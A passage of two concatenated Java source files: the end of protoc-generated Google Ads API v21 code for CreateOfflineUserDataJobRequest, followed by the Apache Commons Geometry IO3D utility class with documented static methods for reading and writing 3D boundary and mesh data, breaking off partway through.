com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.OfflineUserDataJob, com.google.ads.googleads.v21.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. 
Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. 
*/ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return 
builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/commons-geometry
36,372
commons-geometry-io-euclidean/src/main/java/org/apache/commons/geometry/io/euclidean/threed/IO3D.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.commons.geometry.io.euclidean.threed;

import java.net.URL;
import java.nio.file.Path;
import java.util.Collection;
import java.util.stream.Stream;

import org.apache.commons.geometry.euclidean.threed.BoundarySource3D;
import org.apache.commons.geometry.euclidean.threed.PlaneConvexSubset;
import org.apache.commons.geometry.euclidean.threed.Triangle3D;
import org.apache.commons.geometry.euclidean.threed.mesh.TriangleMesh;
import org.apache.commons.geometry.io.core.GeometryFormat;
import org.apache.commons.geometry.io.core.input.FileGeometryInput;
import org.apache.commons.geometry.io.core.input.GeometryInput;
import org.apache.commons.geometry.io.core.input.UrlGeometryInput;
import org.apache.commons.geometry.io.core.output.FileGeometryOutput;
import org.apache.commons.geometry.io.core.output.GeometryOutput;
import org.apache.commons.numbers.core.Precision;

/** Utility class providing convenient access to 3D IO functionality. The static read and write methods here
 * delegate to a default {@link #getDefaultManager() BoundaryIOManager3D} instance. The default
 * configuration should be sufficient for most purposes. If customization is required, consider directly
 * creating and configuring a {@link BoundaryIOManager3D} instance.
 *
 * <p><strong>Examples</strong></p>
 * <p>The example below reads an OBJ file as a stream of triangles, transforms each triangle, and writes the
 * result as a CSV file. The data formats are inferred from the input and output file extensions.</p>
 * <pre>
 * GeometryInput input = new FileGeometryInput(Paths.get("orig.obj"));
 * GeometryOutput scaledOutput = new FileGeometryOutput(Paths.get("scaled.csv"));
 * AffineTransformMatrix3D transform = AffineTransformMatrix3D.createScale(2);
 *
 * // Use the input triangle stream in a try-with-resources statement to ensure
 * // all resources are properly released.
 * try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(input, null, precision)) {
 *     IO3D.write(stream.map(t -&gt; t.transform(transform)), scaledOutput, null);
 * }
 * </pre>
 * @see BoundaryIOManager3D
 */
public final class IO3D {

    /** Utility class; no instantiation. */
    private IO3D() {}

    /** Get a {@link FacetDefinitionReader} for reading facet information from the given file path.
     * The data format is determined by the file extension of the argument.
     * @param path path to obtain a reader for
     * @return facet definition reader
     * @throws IllegalArgumentException if no handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat)
     */
    public static FacetDefinitionReader facetDefinitionReader(final Path path) {
        return facetDefinitionReader(new FileGeometryInput(path), null);
    }

    /** Get a {@link FacetDefinitionReader} for reading facet information from the given URL.
     * The data format is determined by the file extension of the argument.
     * @param url URL to read from
     * @return facet definition reader
     * @throws IllegalArgumentException if no handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat)
     */
    public static FacetDefinitionReader facetDefinitionReader(final URL url) {
        return facetDefinitionReader(new UrlGeometryInput(url), null);
    }

    /** Get a {@link FacetDefinitionReader} for reading facet information from the given input.
     * @param in input to read from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @return facet definition reader
     * @throws IllegalArgumentException if no handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#facetDefinitionReader(GeometryInput, GeometryFormat)
     */
    public static FacetDefinitionReader facetDefinitionReader(final GeometryInput in, final GeometryFormat fmt) {
        return getDefaultManager().facetDefinitionReader(in, fmt);
    }

    /** Return a {@link Stream} providing access to all facets from the given file path. The data format
     * is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(path)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param path file path to read from
     * @return stream providing access to the facets in the specified file
     * @throws IllegalArgumentException if no handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat)
     */
    public static Stream<FacetDefinition> facets(final Path path) {
        return facets(new FileGeometryInput(path), null);
    }

    /** Return a {@link Stream} providing access to all facets from the given URL. The data format
     * is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(url)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param url URL to read from
     * @return stream providing access to the facets from the specified URL
     * @throws IllegalArgumentException if no handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat)
     */
    public static Stream<FacetDefinition> facets(final URL url) {
        return facets(new UrlGeometryInput(url), null);
    }

    /** Return a {@link Stream} providing access to all facets from the given input. The underlying input
     * stream is closed when the returned stream is closed. Callers should therefore use the returned stream
     * in a try-with-resources statement to ensure that all resources are properly released. Ex:
     * <pre>
     *  try (Stream&lt;FacetDefinition&gt; stream = IO3D.facets(in, fmt)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param in input to read from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @return stream providing access to the facets in the input
     * @throws IllegalArgumentException if no read handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#facets(GeometryInput, GeometryFormat)
     */
    public static Stream<FacetDefinition> facets(final GeometryInput in, final GeometryFormat fmt) {
        return getDefaultManager().facets(in, fmt);
    }

    /** Return a {@link Stream} providing access to all boundaries from the given file path. The
     * data format is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;PlaneConvexSubset&gt; stream = IO3D.boundaries(path, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param path file path to read from
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the boundaries in the specified file
     * @throws IllegalArgumentException if no read handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<PlaneConvexSubset> boundaries(final Path path, final Precision.DoubleEquivalence precision) {
        return boundaries(new FileGeometryInput(path), null, precision);
    }

    /** Return a {@link Stream} providing access to all boundaries from the given URL. The data
     * format is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;PlaneConvexSubset&gt; stream = IO3D.boundaries(url, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param url URL to read from
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the boundaries in the specified URL
     * @throws IllegalArgumentException if no read handler has been registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<PlaneConvexSubset> boundaries(final URL url, final Precision.DoubleEquivalence precision) {
        return boundaries(new UrlGeometryInput(url), null, precision);
    }

    /** Return a {@link Stream} providing access to all boundaries from the given input. The underlying input
     * stream is closed when the returned stream is closed. Callers should therefore use the returned stream
     * in a try-with-resources statement to ensure that all resources are properly released. Ex:
     * <pre>
     *  try (Stream&lt;H&gt; stream = IO3D.boundaries(in, fmt, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param in input to read boundaries from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the boundaries in the input
     * @throws IllegalArgumentException if no read handler is registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#boundaries(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<PlaneConvexSubset> boundaries(final GeometryInput in, final GeometryFormat fmt,
            final Precision.DoubleEquivalence precision) {
        return getDefaultManager().boundaries(in, fmt, precision);
    }

    /** Return a {@link Stream} providing access to all triangles from the given file path. The data
     * format is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(path, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param path file path to read from
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the triangles in the specified file
     * @throws IllegalArgumentException if no read handler is registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<Triangle3D> triangles(final Path path, final Precision.DoubleEquivalence precision) {
        return triangles(new FileGeometryInput(path), null, precision);
    }

    /** Return a {@link Stream} providing access to all triangles from the given URL. The data format
     * is determined by the file extension of the argument.
     *
     * <p>The underlying input stream is closed when the returned stream is closed. Callers should
     * therefore use the returned stream in a try-with-resources statement to ensure that all
     * resources are properly released. Ex:
     * </p>
     * <pre>
     *  try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(url, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param url URL to read from
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the triangles from the specified URL
     * @throws IllegalArgumentException if no read handler is registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<Triangle3D> triangles(final URL url, final Precision.DoubleEquivalence precision) {
        return triangles(new UrlGeometryInput(url), null, precision);
    }

    /** Return a {@link Stream} providing access to all triangles from the given input. The underlying input
     * stream is closed when the returned stream is closed. Callers should therefore use the returned stream
     * in a try-with-resources statement to ensure that all resources are properly released. Ex:
     * <pre>
     *  try (Stream&lt;Triangle3D&gt; stream = IO3D.triangles(in, fmt, precision)) {
     *      // access stream content
     *  }
     * </pre>
     * <p>The following exceptions may be thrown during stream iteration:
     * <ul>
     *  <li>{@link IllegalArgumentException} if mathematically invalid data is encountered</li>
     *  <li>{@link IllegalStateException} if a data format error occurs</li>
     *  <li>{@link java.io.UncheckedIOException UncheckedIOException} if an I/O error occurs</li>
     * </ul>
     * @param in input to read from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @param precision precision context used for floating point comparisons
     * @return stream providing access to the triangles in the input
     * @throws IllegalArgumentException if no read handler is registered with the
     *      {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs during stream creation
     * @throws java.io.UncheckedIOException if an I/O error occurs during stream creation
     * @see BoundaryIOManager3D#triangles(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static Stream<Triangle3D> triangles(final GeometryInput in, final GeometryFormat fmt,
            final Precision.DoubleEquivalence precision) {
        return getDefaultManager().triangles(in, fmt, precision);
    }

    /** Return a {@link BoundarySource3D} containing all boundaries from the file at the
     * given path. The data format is determined from the file extension. A runtime exception may be
     * thrown if mathematically invalid boundaries are encountered.
     * @param path file path to read from
     * @param precision precision context used for floating point comparisons
     * @return object containing all boundaries from the file at the given path
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static BoundarySource3D read(final Path path, final Precision.DoubleEquivalence precision) {
        return read(new FileGeometryInput(path), null, precision);
    }

    /** Return a {@link BoundarySource3D} containing all boundaries from the given URL. The data
     * format is determined from the file extension of the URL path. A runtime exception may be
     * thrown if mathematically invalid boundaries are encountered.
     * @param url URL to read from
     * @param precision precision context used for floating point comparisons
     * @return object containing all boundaries from the given URL
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static BoundarySource3D read(final URL url, final Precision.DoubleEquivalence precision) {
        return read(new UrlGeometryInput(url), null, precision);
    }

    /** Return a {@link BoundarySource3D} containing all boundaries from the given input. A runtime
     * exception may be thrown if mathematically invalid boundaries are encountered.
     * @param in input to read boundaries from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @param precision precision context used for floating point comparisons
     * @return object containing all boundaries from the input
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#read(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static BoundarySource3D read(final GeometryInput in, final GeometryFormat fmt,
            final Precision.DoubleEquivalence precision) {
        return getDefaultManager().read(in, fmt, precision);
    }

    /** Return a {@link TriangleMesh} containing all triangles from the given file path. The data
     * format is determined from the file extension of the path. A runtime exception may be
     * thrown if mathematically invalid boundaries are encountered.
     * @param path file path to read from
     * @param precision precision context used for floating point comparisons
     * @return mesh containing all triangles from the given file path
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static TriangleMesh readTriangleMesh(final Path path, final Precision.DoubleEquivalence precision) {
        return readTriangleMesh(new FileGeometryInput(path), null, precision);
    }

    /** Return a {@link TriangleMesh} containing all triangles from the given URL. The data
     * format is determined from the file extension of the URL path. A runtime exception may be
     * thrown if mathematically invalid boundaries are encountered.
     * @param url URL to read from
     * @param precision precision context used for floating point comparisons
     * @return mesh containing all triangles from the given URL
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static TriangleMesh readTriangleMesh(final URL url, final Precision.DoubleEquivalence precision) {
        return readTriangleMesh(new UrlGeometryInput(url), null, precision);
    }

    /** Return a {@link TriangleMesh} containing all triangles from the given input. A runtime exception
     * may be thrown if mathematically invalid boundaries are encountered.
     * @param in input to read from
     * @param fmt format of the input; if {@code null}, the format is determined implicitly from the
     *      file extension of the input {@link GeometryInput#getFileName() file name}
     * @param precision precision context used for floating point comparisons
     * @return a mesh containing all triangles from the input
     * @throws IllegalArgumentException if mathematically invalid data is encountered or no read handler
     *      is registered with the {@link #getDefaultManager() default manager} for the input format
     * @throws IllegalStateException if a data format error occurs
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#readTriangleMesh(GeometryInput, GeometryFormat, Precision.DoubleEquivalence)
     */
    public static TriangleMesh readTriangleMesh(final GeometryInput in, final GeometryFormat fmt,
            final Precision.DoubleEquivalence precision) {
        return getDefaultManager().readTriangleMesh(in, fmt, precision);
    }

    /** Write all boundaries in the stream to given file path. The data format is determined by
     * the file extension of the target path. If the target path already exists, it is overwritten.
     *
     * <p>This method does not explicitly close the {@code boundaries} stream. Callers should use the stream
     * in a try-with-resources statement outside of this method if the stream is required to be closed.</p>
     * @param boundaries stream containing boundaries to write
     * @param path file path to write to
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#write(Stream, GeometryOutput, GeometryFormat)
     */
    public static void write(final Stream<? extends PlaneConvexSubset> boundaries, final Path path) {
        write(boundaries, new FileGeometryOutput(path), null);
    }

    /** Write all boundaries in the stream to the output.
     *
     * <p>This method does not explicitly close the {@code boundaries} stream. Callers should use the stream
     * in a try-with-resources statement outside of this method if the stream is required to be closed.</p>
     * @param boundaries stream containing boundaries to write
     * @param out output to write to
     * @param fmt format of the output; if {@code null}, the format is determined implicitly from the
     *      file extension of the output {@link GeometryOutput#getFileName() file name}
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#write(Stream, GeometryOutput, GeometryFormat)
     */
    public static void write(final Stream<? extends PlaneConvexSubset> boundaries, final GeometryOutput out,
            final GeometryFormat fmt) {
        getDefaultManager().write(boundaries, out, fmt);
    }

    /** Write all boundaries from {@code src} to the given file path. The data format
     * is determined by the file extension of the target path. If the target path already exists,
     * it is overwritten.
     * @param src boundary source containing the boundaries to write
     * @param path file path to write to
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see org.apache.commons.geometry.io.core.BoundaryIOManager#write(
     *      org.apache.commons.geometry.core.partitioning.BoundarySource, GeometryOutput, GeometryFormat)
     */
    public static void write(final BoundarySource3D src, final Path path) {
        write(src, new FileGeometryOutput(path), null);
    }

    /** Write all boundaries from {@code src} to the given output.
     * @param src boundary source containing the boundaries to write
     * @param out output to write to
     * @param fmt format of the output; if {@code null}, the format is determined implicitly from the
     *      file extension of the output {@link GeometryOutput#getFileName() file name}
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see org.apache.commons.geometry.io.core.BoundaryIOManager#write(
     *      org.apache.commons.geometry.core.partitioning.BoundarySource, GeometryOutput, GeometryFormat)
     */
    public static void write(final BoundarySource3D src, final GeometryOutput out, final GeometryFormat fmt) {
        getDefaultManager().write(src, out, fmt);
    }

    /** Write the given facets to the file path. The data format is determined by the file extension of
     * the target path. If the target path already exists, it is overwritten.
     * @param facets facets to write
     * @param path path to write to
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#writeFacets(Collection, GeometryOutput, GeometryFormat)
     */
    public static void writeFacets(final Collection<? extends FacetDefinition> facets, final Path path) {
        writeFacets(facets, new FileGeometryOutput(path), null);
    }

    /** Write the given collection of facets to the output.
     * @param facets facets to write
     * @param out output to write to
     * @param fmt format of the output; if {@code null}, the format is determined implicitly from the
     *      file extension of the output {@link GeometryOutput#getFileName() file name}
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#writeFacets(Collection, GeometryOutput, GeometryFormat)
     */
    public static void writeFacets(final Collection<? extends FacetDefinition> facets, final GeometryOutput out,
            final GeometryFormat fmt) {
        getDefaultManager().writeFacets(facets, out, fmt);
    }

    /** Write all facets in the stream to the file path. The data format is determined by the file
     * extension of the target path. If the target path already exists, it is overwritten.
     *
     * <p>This method does not explicitly close the {@code facets} stream. Callers should use the stream
     * in a try-with-resources statement outside of this method if the stream is required to be closed.</p>
     * @param facets stream containing facets to write
     * @param path path to write to
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#writeFacets(Stream, GeometryOutput, GeometryFormat)
     */
    public static void writeFacets(final Stream<? extends FacetDefinition> facets, final Path path) {
        writeFacets(facets, new FileGeometryOutput(path), null);
    }

    /** Write all facets in the stream to the output.
     *
     * <p>This method does not explicitly close the {@code facets} stream. Callers should use the stream
     * in a try-with-resources statement outside of this method if the stream is required to be closed.</p>
     * @param facets stream containing facets to write
     * @param out output to write to
     * @param fmt format of the output; if {@code null}, the format is determined implicitly from the
     *      file extension of the output {@link GeometryOutput#getFileName() file name}
     * @throws IllegalArgumentException if no write handler is registered with the
     *      {@link #getDefaultManager() default manager} for the output format
     * @throws java.io.UncheckedIOException if an I/O error occurs
     * @see BoundaryIOManager3D#writeFacets(Stream, GeometryOutput, GeometryFormat)
     */
